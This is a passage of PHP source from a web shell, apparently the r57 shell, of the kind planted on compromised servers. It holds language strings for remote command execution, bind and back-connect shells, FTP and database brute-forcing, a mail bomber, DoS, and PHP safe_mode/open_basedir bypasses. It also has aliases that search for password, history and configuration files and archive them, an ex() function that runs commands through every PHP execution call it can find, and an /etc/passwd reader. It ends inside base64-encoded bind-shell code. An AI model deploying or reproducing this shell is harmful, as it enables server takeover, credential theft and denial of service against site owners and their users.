   'ru_text132'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir,  ? ?? ??  ?? ??  ? ?? ? ?  ?  ? ? ?? symlink() (PHP <= 5.2.1)',

   'ru_text133'=>'',

   'ru_text134'=>'???? ?? ?  ? ?? ?',

   'ru_text135'=>'? ? ',

   'ru_text136'=>'? ? ? ? ? ? ?  ?? ',

   'ru_text137'=>'I ? ? ?',

   'ru_text138'=>'I ?? ?',

   'ru_text139'=>'? -? ????',

   'ru_text140'=>'DoS',

   'ru_text141'=>'I?? ? ?? ! A ? ???  ? ? A??-??? ? .',

   'ru_err0'=>'I? ? ! ?? ? ??  ? ?      ',

   'ru_err1'=>'I? ? ! ?? ? ??  ? ? ?    ',

   'ru_err2'=>'I? ? ! ?? ?? ?  ? ? ?  ',

   'ru_err3'=>'I? ? ! ?? ?? ?   ? ? ? ??   ftp ??? ???',

   'ru_err4'=>'I? ?   ? ? ?  ?  ftp ??? ???',

   'ru_err5'=>'I? ? ! ?? ?? ?   ?????  ? ?? ? ? ? ?  ftp ??? ???',

   'ru_err6'=>'I? ? ! ?? ?? ?   ? ? ?   ? ? ',

   'ru_err7'=>'I ? ?   ? ? ?? ',

   /* --------------------------------------------------------------- */

   'eng_text1' =>'Executed command',

   'eng_text2' =>'Execute command on server',

   'eng_text3' =>'Run command',

   'eng_text4' =>'Work directory',

   'eng_text5' =>'Upload files on server',

   'eng_text6' =>'Local file',

   'eng_text7' =>'Aliases',

   'eng_text8' =>'Select alias',

   'eng_butt1' =>'Execute',

   'eng_butt2' =>'Upload',

   'eng_text9' =>'Bind port to /bin/bash',

   'eng_text10'=>'Port',

   'eng_text11'=>'Password for access',

   'eng_butt3' =>'Bind',

   'eng_text12'=>'back-connect',

   'eng_text13'=>'IP',

   'eng_text14'=>'Port',

   'eng_butt4' =>'Connect',

   'eng_text15'=>'Upload files from remote server',

   'eng_text16'=>'With',

   'eng_text17'=>'Remote file',

   'eng_text18'=>'Local file',

   'eng_text19'=>'Exploits',

   'eng_text20'=>'Use',

   'eng_text21'=>' New name',

   'eng_text22'=>'datapipe',

   'eng_text23'=>'Local port',

   'eng_text24'=>'Remote host',

   'eng_text25'=>'Remote port',

   'eng_text26'=>'Use',

   'eng_butt5' =>'Run',

   'eng_text28'=>'Work in safe_mode',

   'eng_text29'=>'ACCESS DENIED',

   'eng_butt6' =>'Change',

   'eng_text30'=>'Cat file',

   'eng_butt7' =>'Show',

   'eng_text31'=>'File not found',

   'eng_text32'=>'Eval PHP code',

   'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',

   'eng_butt8' =>'Test',

   'eng_text34'=>'Test bypass safe_mode with include function',

   'eng_text35'=>'Test bypass safe_mode with load file in mysql',

   'eng_text36'=>'Database . Table',

   'eng_text37'=>'Login',

   'eng_text38'=>'Password',

   'eng_text39'=>'Database',

   'eng_text40'=>'Dump database table',

   'eng_butt9' =>'Dump',

   'eng_text41'=>'Save dump in file',

   'eng_text42'=>'Edit files',

   'eng_text43'=>'File for edit',

   'eng_butt10'=>'Save',

   'eng_text44'=>'Can\'t edit file! Only read access!',

   'eng_text45'=>'File saved',

   'eng_text46'=>'Show phpinfo()',

   'eng_text47'=>'Show variables from php.ini',

   'eng_text48'=>'Delete temp files',

   'eng_butt11'=>'Edit file',

   'eng_text49'=>'Delete script from server',

   'eng_text50'=>'View cpu info',

   'eng_text51'=>'View memory info',

   'eng_text52'=>'Find text',

   'eng_text53'=>'In dirs',

   'eng_text54'=>'Find text in files',

   'eng_butt12'=>'Find',

   'eng_text55'=>'Only in files',

   'eng_text56'=>'Nothing :(',

   'eng_text57'=>'Create/Delete File/Dir',

   'eng_text58'=>'name',

   'eng_text59'=>'file',

   'eng_text60'=>'dir',

   'eng_butt13'=>'Create/Delete',

   'eng_text61'=>'File created',

   'eng_text62'=>'Dir created',

   'eng_text63'=>'File deleted',

   'eng_text64'=>'Dir deleted',

   'eng_text65'=>'Create',

   'eng_text66'=>'Delete',

   'eng_text67'=>'Chown/Chgrp/Chmod',

   'eng_text68'=>'Command',

   'eng_text69'=>'param1',

   'eng_text70'=>'param2',

   'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",

   'eng_text72'=>'Text for find',

   'eng_text73'=>'Find in folder',

   'eng_text74'=>'Find in files',

   'eng_text75'=>'* you can use regexp',

   'eng_text76'=>'Search text in files via find',

   'eng_text80'=>'Type',

   'eng_text81'=>'Net',

   'eng_text82'=>'Databases',

   'eng_text83'=>'Run SQL query',

   'eng_text84'=>'SQL query',

   'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',

   'eng_text86'=>'Download files from server',

   'eng_butt14'=>'Download',

   'eng_text87'=>'Download files from remote ftp-server',

   'eng_text88'=>'server:port',

   'eng_text89'=>'File on ftp',

   'eng_text90'=>'Transfer mode',

   'eng_text91'=>'Archivation',

   'eng_text92'=>'without arch.',

   'eng_text93'=>'FTP',

   'eng_text94'=>'FTP-bruteforce',

   'eng_text95'=>'Users list',

   'eng_text96'=>'Can\'t get users list',

   'eng_text97'=>'checked: ',

   'eng_text98'=>'success: ',

   'eng_text99'=>'/etc/passwd',

   'eng_text100'=>'Send file to remote ftp server',

   'eng_text101'=>'Use reverse (user -> resu)',

   'eng_text102'=>'Mail',

   'eng_text103'=>'Send email',

   'eng_text104'=>'Send file to email',

   'eng_text105'=>'To',

   'eng_text106'=>'From',

   'eng_text107'=>'Subj',

   'eng_butt15'=>'Send',

   'eng_text108'=>'Mail',

   'eng_text109'=>'Hide',

   'eng_text110'=>'Show',

   'eng_text111'=>'SQL-Server : Port',

   'eng_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',

   'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)',

   'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)',

   'eng_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)',

   'eng_text116'=>'Copy from',

   'eng_text117'=>'to',

   'eng_text118'=>'File copied',

   'eng_text119'=>'Cant copy file',

   'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) By KingDefacer',

   'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) By KingDefacer',

   'eng_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)',

   'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',

   'eng_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)',

   'eng_text125'=>'Data',

   'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',

   'eng_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)',

   'eng_text128'=>'Modify/Access date(touch)',

   'eng_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)',

   'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',

   'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',

   'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',

   'eng_text133'=>'',

   'eng_text134'=>'Database-bruteforce',

   'eng_text135'=>'Dictionary',

   'eng_text136'=>'Creating evil symlink',

   'eng_text137'=>'Useful',

   'eng_text138'=>'Dangerous',

   'eng_text139'=>'Mail Bomber',

   'eng_text140'=>'DoS',

   'eng_text141'=>'Danger! Web-daemon crash possible.',

   'eng_err0'=>'Error! Can\'t write in file ',

   'eng_err1'=>'Error! Can\'t read file ',

   'eng_err2'=>'Error! Can\'t create ',

   'eng_err3'=>'Error! Can\'t connect to ftp',

   'eng_err4'=>'Error! Can\'t login on ftp server',

   'eng_err5'=>'Error! Can\'t change dir on ftp',

   'eng_err6'=>'Error! Can\'t sent mail',

   'eng_err7'=>'Mail send',

);

/*

   A ?   ? ??

   I ???  ??? ?  ?? ? ? ?? ?  ? ? ?   ?? ?   ???-??  ? ??. ( ??? ?  ? ? ? ?? ? ?   ? ? ??   ??  )

   A  ? ???? ? ?  ? ? ??     ?????   ? ?? .

*/

   $aliases=array(

   '----------------------------------locate'=>'',

   'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',

   '----------------------------------tar'=>'',

   'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt',

   '----------------------------------1'=>'',

   'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt',

   '----------------------------------2'=>'',

   'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt',

   '----------------------------------find'=>'',

   'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt',

   '-----------------------------------'=>'',

   'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt',

   'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt',

   '----------------------------------------------------------------------------------------------------'=>'ls -la'

);

   $table_up1  = ":: ";

   $table_up2  = " ::";

   $table_up3  = "";                                                        $arrow = " 4";                            
   $lb = "[";                                             
   $rb = "]";                                             
   $font = "";                                          
   $ts = "
";
   $table_end1 = "




";                           
   $te = "
";

   $fs = "";

   $fe = "";

   if(isset($_GET['users']))

    if(!$users=get_users('/etc/passwd')) { echo "".$lang[$language.'_text96'].""; }

    else

     echo '';

     foreach($users as $user) { echo $user."
"; }

     echo '';

    echo "
[ BACK ]
"; die();

   if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }

   if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}

   $unix = 0;

   if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;

   if(empty($dir))

    $os = getenv('OS');

    if(empty($os)){ $os = @php_uname(); }

    if(empty($os)){ $os ="-"; $unix=1; }

    else

       if(@eregi("^win",$os)) { $unix = 0; }

       else { $unix = 1; }

   if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")

       echo $head;

       if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }

       else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }

       $sr->SearchText(0,0);

       $res = $sr->GetResultFiles();

       $found = $sr->GetMatchesCount();

       $titles = $sr->GetTitles();

       $r = "";

       if($found > 0)

         $r .= "";                                                        foreach($res as $file=>$v)                                                
         {                                                                         
           $r .= "
";                                                                      $r .= "
";                                                                     foreach($v as $a=>$b)                                                   
           {                                                                       
             $r .= "
";                                                                      $r .= "
";             $r .= "
";                   $r .= "
\n";                                                                 }                                                                       
         }                                                                         
         $r .= "




".ws(3);             
           $r .= (!$unix)? str_replace("/","\\",$file) : $file;                    
           $r .= "";                                              
           $r .= "



".$a."
".ws(2).$b."



";

       echo $r;

       else

         echo "".$lang[$language.'_text56']."
";

     echo "
[ BACK ]
";

     die();

   if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }

   $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');

   if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }

   function ws($i)

   return @str_repeat(" ",$i);

   function ex($cfe)

    $res = '';

    if (!empty($cfe))

     if(@function_exists('exec'))

       @exec($cfe,$res);

       $res = join("\n",$res);

     elseif(@function_exists('shell_exec'))

       $res = @shell_exec($cfe);

     elseif(@function_exists('system'))

       @ob_start();

       @system($cfe);

       $res = @ob_get_contents();

       @ob_end_clean();

     elseif(@function_exists('passthru'))

       @ob_start();

       @passthru($cfe);

       $res = @ob_get_contents();

       @ob_end_clean();

     elseif(@is_resource($f = @popen($cfe,"r")))

      $res = "";

      if(@function_exists('fread') && @function_exists('feof')){

       while(!@feof($f)) { $res .= @fread($f,1024); }

      }else if(@function_exists('fgets') && @function_exists('feof')){

       while(!@feof($f)) { $res .= @fgets($f,1024); }

      @pclose($f);

     elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))

      $res = "";

      if(@function_exists('fread') && @function_exists('feof')){

       while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}

      }else if(@function_exists('fgets') && @function_exists('feof')){

       while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}

      @proc_close($f);

     elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))

       $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';

       $pid = @pcntl_fork();

       if ($pid == -1) {

        $res .= '[-] Could not children fork. Exit';

       } else if ($pid) {

            if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}

            else {$res .= '[-] Error. Command incorrect.';}

       } else {

            $cfe = array(" -e 'system(\"$cfe\")'");

            if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);

            if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);

            die();

    return $res;

   function get_users($filename)

     $users = array();

     $rows=@explode("\n",readzlib($filename));

     if(!$rows) return 0;

     foreach ($rows as $string)

      $user = @explode(":",trim($string));

      if(substr($string,0,1)!='#') array_push($users,$user[0]);

     return $users;

   function err($n,$txt='')

   echo '';
   echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];                          
   if(!empty($txt)) { echo " $txt"; }                                              
   echo '
';

   return null;

   function perms($mode)

   if (!$GLOBALS['unix']) return 0;

   if( $mode & 0x1000 ) { $type='p'; }

   else if( $mode & 0x2000 ) { $type='c'; }

   else if( $mode & 0x4000 ) { $type='d'; }

   else if( $mode & 0x6000 ) { $type='b'; }

   else if( $mode & 0x8000 ) { $type='-'; }

   else if( $mode & 0xA000 ) { $type='l'; }

   else if( $mode & 0xC000 ) { $type='s'; }

   else $type='u';

   $owner["read"] = ($mode & 00400) ? 'r' : '-';

   $owner["write"] = ($mode & 00200) ? 'w' : '-';

   $owner["execute"] = ($mode & 00100) ? 'x' : '-';

   $group["read"] = ($mode & 00040) ? 'r' : '-';

   $group["write"] = ($mode & 00020) ? 'w' : '-';

   $group["execute"] = ($mode & 00010) ? 'x' : '-';

   $world["read"] = ($mode & 00004) ? 'r' : '-';

   $world["write"] = ($mode & 00002) ? 'w' : '-';

   $world["execute"] = ($mode & 00001) ? 'x' : '-';

   if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';

   if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';

   if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';

   $s=sprintf("%1s", $type);

   $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);

   $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);

   $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);

   return trim($s);

   function in($type,$name,$size,$value,$checked=0)

    $ret = "
    if($size != 0) { $ret .= "size=".$size." "; }                                  
    $ret .= "value=\"".$value."\"";                                                
    if($checked) $ret .= " checked";                                               
    return $ret.">";                                                               
   }                                                                               
   function which($pr)                                                             
   {                                                                               
   $path = '';                                                                     
   $path = ex("which $pr");                                                        
   if(!empty($path)) { return $path; } else { return false; }                      
   }                                                                               
   function cf($fname,$text)                                                       
   {                                                                               
    $w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0); 
    if($w_file)                                                                    
    {                                                                              
    @fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
    @fclose($w_file);                                                              
    }                                                                              
   }                                                                               
   function sr($l,$t1,$t2)                                                         
    {                                                                              
    return "".$t1."".$t2."";
    }                                                                              
   if (!@function_exists("view_size"))                                             
   {                                                                               
   function view_size($size)                                                       
   {                                                                               
    if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
    elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
    elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}      
    else {$size = $size . " B";}                                                   
    return $size;                                                                  
   }                                                                               
   }                                                                               
     function DirFilesR($dir,$types='')                                            
     {                                                                             
       $files = Array();                                                           
       if(($handle = @opendir($dir)) || (@function_exists('scandir')))             
       {                                                                           
         while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir))))
         {                                                                         
           if ($file != "." && $file != "..")                                      
           {                                                                       
             if(@is_dir($dir."/".$file))                                           
               $files = @array_merge($files,DirFilesR($dir."/".$file,$types));     
             else                                                                  
             {                                                                     
               $pos = @strrpos($file,".");                                         
               $ext = @substr($file,$pos,@strlen($file)-$pos);                     
               if($types)                                                          
               {                                                                   
                 if(@in_array($ext,explode(';',$types)))                           
                   $files[] = $dir."/".$file;                                      
               }                                                                   
               else                                                                
                 $files[] = $dir."/".$file;                                        
             }                                                                     
           }                                                                       
         }                                                                         
         @closedir($handle);                                                       
       }                                                                           
       return $files;                                                              
     }                                                                             
     class SearchResult                                                            
     {                                                                             
       var $text;                                                                  
       var $FilesToSearch;                                                         
       var $ResultFiles;                                                           
       var $FilesTotal;                                                            
       var $MatchesCount;                                                          
       var $FileMatschesCount;                                                     
       var $TimeStart;                                                             
       var $TimeTotal;                                                             
       var $titles;                                                                
       function SearchResult($dir,$text,$filter='')                                
       {                                                                           
         $dirs = @explode(";",$dir);                                               
         $this->FilesToSearch = Array();                                           
         for($a=0;$a
           $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
         $this->text = $text;                                                      
         $this->FilesTotal = @count($this->FilesToSearch);                         
         $this->TimeStart = getmicrotime();                                        
         $this->MatchesCount = 0;                                                  
         $this->ResultFiles = Array();                                             
         $this->FileMatchesCount = Array();                                        
         $this->titles = Array();                                                  
       }                                                                           
       function GetFilesTotal() { return $this->FilesTotal; }                      
       function GetTitles() { return $this->titles; }                              
       function GetTimeTotal() { return $this->TimeTotal; }                        
       function GetMatchesCount() { return $this->MatchesCount; }                  
       function GetFileMatchesCount() { return $this->FileMatchesCount; }          
       function GetResultFiles() { return $this->ResultFiles; }                    
       function SearchText($phrase=0,$case=0) {                                    
       $qq = @explode(' ',$this->text);                                            
       $delim = '|';                                                               
         if($phrase)                                                               
           foreach($qq as $k=>$v)                                                  
             $qq[$k] = '\b'.$v.'\b';                                               
         $words = '('.@implode($delim,$qq).')';                                    
         $pattern = "/".$words."/";                                                
         if(!$case)                                                                
           $pattern .= 'i';                                                        
         foreach($this->FilesToSearch as $k=>$filename)                            
         {                                                                         
           $this->FileMatchesCount[$filename] = 0;                                 
           $FileStrings = @file($filename) or @next;                               
           for($a=0;$a<@count($FileStrings);$a++)                                  
           {                                                                       
             $count = 0;                                                           
             $CurString = $FileStrings[$a];                                        
             $CurString = @Trim($CurString);                                       
             $CurString = @strip_tags($CurString);                                 
             $aa = '';                                                             
             if(($count = @preg_match_all($pattern,$CurString,$aa)))               
             {                                                                     
               $CurString = @preg_replace($pattern,"\\1",$CurString);
               $this->ResultFiles[$filename][$a+1] = $CurString;                   
               $this->MatchesCount += $count;                                      
               $this->FileMatchesCount[$filename] += $count;                       
             }                                                                     
           }                                                                       
         }                                                                         
         $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);           
       }                                                                           
     }                                                                             
     function getmicrotime()                                                       
     {                                                                             
       list($usec,$sec) = @explode(" ",@microtime());                              
       return ((float)$usec + (float)$sec);                                        
     }                                                                             
   $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
   A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
